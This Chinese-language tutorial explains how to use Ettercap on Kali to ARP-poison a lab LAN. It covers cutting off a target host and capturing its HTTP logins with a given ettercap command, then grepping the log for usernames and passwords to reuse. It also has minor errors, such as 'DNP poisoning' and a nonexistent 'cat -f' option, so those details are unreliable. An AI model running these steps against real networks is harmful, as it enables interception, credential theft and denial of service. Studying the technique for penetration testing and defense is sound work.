Ettercap的基本使用

1.Ettercap工具介绍

Ettercap是基于ARP地址欺骗方式的网络嗅探工具，主要适用于交换的局域网络

借助Ettercap嗅探软件，渗透测试人员可以检测网络内明文数据通讯的安全性，及时采取措施，避免敏感的用户名/密码等数据以明文的方式进行传输

2.Ettercap劫持用户信息攻击步骤

2.1.启动Ettercap

在kali的终端中输入

ettercap -G

点击右上角的勾号

2.2.扫描局域网内存活的主机

点击左上角的列表，host list

如图

192.168.241.2 就是网关的ip

192.168.241.129 就是靶机的ip

2.3.添加目标

选中网关点击 Add to Target1

选中靶机点击 Add to Target2

2.4.发起攻击

2.4.1.断网攻击

停止扫描+ARP poisoning

2.4.2.窃取数据包

打开扫描 + ARP poisoning

3.Ettercap软件功能介绍

3.1启动界面

开启嗅探Sniffing at startup选择网卡Primary interface是否开启桥接模式Bridged sniffing桥接模式下的网卡Bridged interface

3.2中间人攻击菜单

ARP poisoningARP攻击DNP poisoningDNP攻击ICMP redirectICMP重定向攻击Port stealing端口欺骗DHCP spoofingDHCP欺骗stop MITM attack(s)停止攻击SSL interceptSSL嗅探

3.3更多选项

Target ： 攻击列表
Current targets正在攻击的列表Select targets选择攻击列表Protocol攻击协议Reverse matching匹配规则Wipe targets擦除攻击
Hosts：显示主机
Hosts list扫描到的主机列表Enable ipv6 scan扫描ipv6地址Scan for hosts扫描主机列表load hosts from file从外部文件载入主机列表Save hosts to file保存主机列表到文件
view：视图
Connections连接信息ProfilesIP地址信息Statistics统计信息

其他的

Filters: 载入二进制脚本

Plugins：插件

Logging：日志

4.命令行运行Ettercap

4.1运行命令讲解

ettercap -i eth0 -Tq -M arp:remote/ip(host)// /net gatemask// >>b.txt

i后面跟着连接局域网的网卡T指的是text文本模式q以安静模式执行这个命令M指定攻击模式>>输出文件
4.2攻击模式举例

ettercap -Tq -i eth0 -M arp:remote /192.168.241.2// /192.168.241.129// >> b.txt

此时，靶机（192.168.241.129)已经被攻击了

当靶机登录后台网址时，如果采用http协议进行数据传输则我们可以拿到他输入的账号密码

如图，我们可以看到靶机登录的网址，账号，密码

密码虽然是加密过的，但我们可以在抓包后直接复制黏贴即可实现登录

4.3分析攻击日志

查看

cat -f b.txt

过滤无用信息

cat b.txt | grep "CONTENT"

cat b.txt | grep "USER"

cat b.txt | egrep "USER|CONTENT"

停止查看 ctrl + c

4.4收集保存用户信息

cat -n b.txt | egrep "USER|CONTENT" > arp.log

-n 添加行号

egrep 过滤规则

输出文件